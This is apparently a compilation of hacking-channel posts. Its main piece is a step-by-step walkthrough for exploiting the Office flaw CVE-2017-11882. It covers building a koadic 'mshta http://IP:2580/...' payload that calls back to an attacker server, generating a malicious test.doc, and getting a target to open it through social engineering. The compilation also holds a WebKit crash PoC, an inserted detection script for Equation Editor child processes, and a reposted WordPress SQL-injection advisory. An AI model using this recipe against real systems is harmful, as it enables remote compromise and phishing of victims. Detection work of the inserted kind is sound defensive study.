1) Microsoft Office has once again revealed a memory corruption vulnerability, CVE ID CVE-2017-11882, which an attacker can exploit to execute arbitrary code in the context of the currently logged-in user.

2) A failed exploitation attempt may cause a denial-of-service condition. The affected versions include the relevant versions of Office 2016, Office 2013, Office 2010 and Office 2007.

3) Update: a PoC for the Microsoft Office memory corruption vulnerability CVE-2017-11882 has been released. The reason it spread so widely is that exploitation shows no visible sign, so users cannot tell that anything happened! Here is a simple reproduction for everyone.


🦑 Tools used:

1) Post-exploitation tool: koadic (used to construct the payload and get the shell). Tool address: https://github.com/weiruyi123/koadic (this is the version I modified to fix the coding errors)

2) Vulnerability PoC: https://github.com/weiruyi123/CVE-2017-11882

(The PoC has a limit on the command length; for details, please refer to the README on GitHub.)

πŸ¦‘ Operating environment:

1) Python2.7

2) Target: windows server 2008 R2 standard IP: 192.168.1.171

3) Attack machine: A VPS with a public IP (because I don't want to do forwarding, I use the VPS as a rebound shell service to show everyone)

4) Open bash and cd into the downloaded PoC directory. The PoC is written in Python, so you need a Python environment installed.

Next we open the Windows Server virtual machine.

5) A newly installed virtual machine (without any patches).

Here I use SSH to connect to my VPS and git clone koadic. After recursively adding execute permissions to the directory, cd into the koadic directory and run ./koadic.py; this tool also requires a Python environment.

6) Then we set LHOST and LPORT, filling in your intranet IP address (if it is intranet penetration) or port forwarding address, and then enter run to generate the payload.

7) Copy 'mshta http://IP:2580/acg9N', then go back to bash and open the PoC directory. The usage of the PoC is:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

-c is the command executed remotely and -o is the location of the generated document. Modify the command at -c and the save location according to your situation; with the payload command I generated, it is:

python Command_CVE-2017-11882.py -c "mshta http://IP:2580/acg9N" -o test.doc

Of course, you can also use msf to generate a PowerShell one-liner payload and substitute it for the -c parameter.

8) You can see that we have successfully generated a malicious document (see the picture sent by UndercOde).

9) Next, you only need to get the target to open it through social engineering or other means. We will open the document in the Windows Server virtual machine.

10) Then you will find that a zombie shell with code 0 has called back to koadic, and there is no error message on the target after the document is opened.
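Added detection example, not part of the original post: CVE-2017-11882 is a flaw in the Office Equation Editor (EQNEDT32.EXE), and exploitation makes that process launch a child such as mshta.exe or cmd.exe, which it never does legitimately, so the defender's check is to scan process-creation records for that parent/child pair. The CSV layout, host names and the 198.51.100.7 address below are constructed sample data, not real telemetry.

```python
# Added detection example, not part of the original post. The CSV layout, host
# names and the 198.51.100.7 address are constructed sample data.
import csv
import io
import ntpath

EQUATION_EDITOR = "eqnedt32.exe"
# Children that Equation Editor has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation records: timestamp, host, parent image, child image, command line.
SAMPLE_LOG = """\
ts,host,parent_image,image,cmdline
2020-01-10T09:12:01,WS-01,C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE,C:\\Windows\\splwow64.exe,splwow64.exe 12288
2020-01-10T09:12:03,WS-01,C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE,C:\\Windows\\System32\\mshta.exe,mshta http://198.51.100.7:2580/acg9N
2020-01-10T09:14:10,WS-03,C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE,C:\\Windows\\System32\\notepad.exe,notepad.exe
2020-01-10T09:15:44,WS-02,C:\\Windows\\explorer.exe,C:\\Windows\\System32\\cmd.exe,cmd.exe /c calc.exe
"""


def find_equation_editor_children(log_text):
    """Return one (host, child, severity, cmdline) tuple per process spawned by EQNEDT32.EXE.

    Any child of Equation Editor is anomalous (medium); a shell or script
    interpreter as the child is rated high, matching the mshta payload in this post.
    """
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        parent = ntpath.basename(row["parent_image"]).lower()
        if parent != EQUATION_EDITOR:
            continue
        child = ntpath.basename(row["image"]).lower()
        severity = "high" if child in SUSPICIOUS_CHILDREN else "medium"
        hits.append((row["host"], child, severity, row["cmdline"]))
    return hits


if __name__ == "__main__":
    for host, child, severity, cmdline in find_equation_editor_children(SAMPLE_LOG):
        print(f"[{severity}] {host}: EQNEDT32.EXE -> {child}: {cmdline}")
```

On the constructed records this flags the mshta launch on WS-01 as high and the notepad launch on WS-03 as medium, while the ordinary cmd.exe under explorer.exe is ignored.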

Written by UndercOde

🦑 iOS Safari WebKit CVE-2017-13785 remote code execution vulnerability PoC:
> twitter.com/UndercodeNews

LET'S START:

1) WebKit is a layout engine used by web browsers to render web pages. It is used in Apple Safari, and forks of it are used in Chromium-based web browsers such as Opera and Google Chrome.
PoC:


<style>
* { max-height: 0; -webkit-text-combine: horizontal; -webkit-writing-mode: vertical-rl; }
</style>
<script>
function go() {
window.getSelection().setPosition(h,1);
document.execCommand("delete", false);
document.execCommand("delete", false);
}
</script>
<body onload=go()>
<listing>
<dd contenteditable="true">
<h3 id="h">I>EO~P</h3>


🦑 ASan log:


==30388==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000f5de6 at pc 0x00010ff1c575 bp 0x7fff5a427300 sp 0x7fff5a4272f8
READ of size 2 at 0x6030000f5de6 thread T0
==30388==WARNING: invalid path to external symbolizer!
==30388==WARNING: Failed to use and restart external symbolizer!

#0 0x10ff1c574 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574)
#1 0x110edd834 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfec834)
#2 0x110ee587f in WebCore::InlineTextBox::positionForOffset(unsigned int) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore

AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2b574) in WTF::StringImpl::at(unsigned int) const
Shadow bytes around the buggy address:
0x1c060001eb60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x1c060001eb70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd

...

Written by UndercOde

🦑 Programming languages required to be a white hat hacker:
t.me/UndercOdeTesting

1) HTML: one of the easiest and most widely used static markup languages, present in every website you see in your browser. Learning HTML is recommended because it helps you understand web actions, responses and logic.

2) CSS: this is the design of the website; it is like the wallpaper or decoration in a house.

3) JavaScript: a client-side web programming language, mostly used on websites for a better user interface and quicker response. If you are interested in a hacking career you need to learn JavaScript, because it helps you understand client-side mechanisms, which is essential for finding client-side flaws.

4) PHP: a dynamic server-side language responsible for managing web apps and databases. PHP is considered one of the most essential languages because it controls everything on the site and server, like the captain of a ship. It is advised to learn PHP well.

5) SQL: SQL is responsible for storing and managing sensitive and confidential data such as user credentials and the bank and personal information of website visitors. Black hat hackers mostly target SQL databases and steal information which is later sold on underground dark web forums. If you want to be a good security researcher, you should learn SQL so that you can find flaws in a website and report them.

🦑 Exploit programming:

6) Python: it is said that a security researcher or hacker should know Python because it is the core language for creating exploits and tools. Security experts and even pro hackers suggest that mastering Python is the best way to learn hacking. Python offers wide flexibility, and you can create exploits only if you are good at Python.

7) Ruby: Ruby is a simple yet complicated object-oriented language. Ruby is very useful when it comes to exploit writing; it is used by hackers for Meterpreter scripting, and the most famous hacker tool, the Metasploit framework, is written in Ruby. Though Ruby may not be as versatile as Python, knowledge of Ruby is a must for understanding exploits.

Written by UndercOde

🦑 WordPress SQL injection vulnerability, all versions before 4.8.3 affected:
pinterest.com/Undercode_Testing


1) WordPress has had quite a lot of vulnerabilities. Recently a SQL injection vulnerability in WordPress was disclosed; all versions before 4.8.3 are affected. Because of its wide usage, NSFOCUS issued a threat notice, the full text of which follows:

2) WordPress WPDB SQL injection vulnerability threat warning notice
On October 31, 2017, WordPress officially released the 4.8.3 security update, which fixes a SQL injection vulnerability present in all previous versions.

3) The vulnerability stems from the fact that $wpdb->prepare() can generate dangerous queries, leading to potential SQL injection. WordPress core itself is not readily affected, but WordPress has hardened the function to prevent plugins and themes from triggering the vulnerability.

🦑 1) Related link:

https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/

2) Affected scope

Affected versions: WordPress <= 4.8.2
Unaffected version: WordPress 4.8.3

3) Solution

> WordPress has officially released version 4.8.3 to fix this vulnerability. Users running 4.8.2 and earlier should upgrade to 4.8.3 promptly to protect against it.

> Reference link:

https://wordpress.org/download/

Written by UndercOde

🦑 NSFOCUS Technology Statement:
twitter.com/UndercodeNews
1) This security bulletin is only used to describe possible security issues.

2) NSFOCUS does not provide any guarantee or commitment for this security bulletin. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this security bulletin are the user's own responsibility.

3) NSFOCUS and the author of the security bulletin shall not bear any responsibility for this. NSFOCUS has the right to modify and interpret this security announcement.

4) If you want to reprint or disseminate this security bulletin, you must ensure the integrity of this security bulletin, including the entire contents of the copyright statement. Without the permission of NSFOCUS Technology, the content of this security bulletin may not be modified or added arbitrarily, and it may not be used for commercial purposes in any way.

Written by UndercOde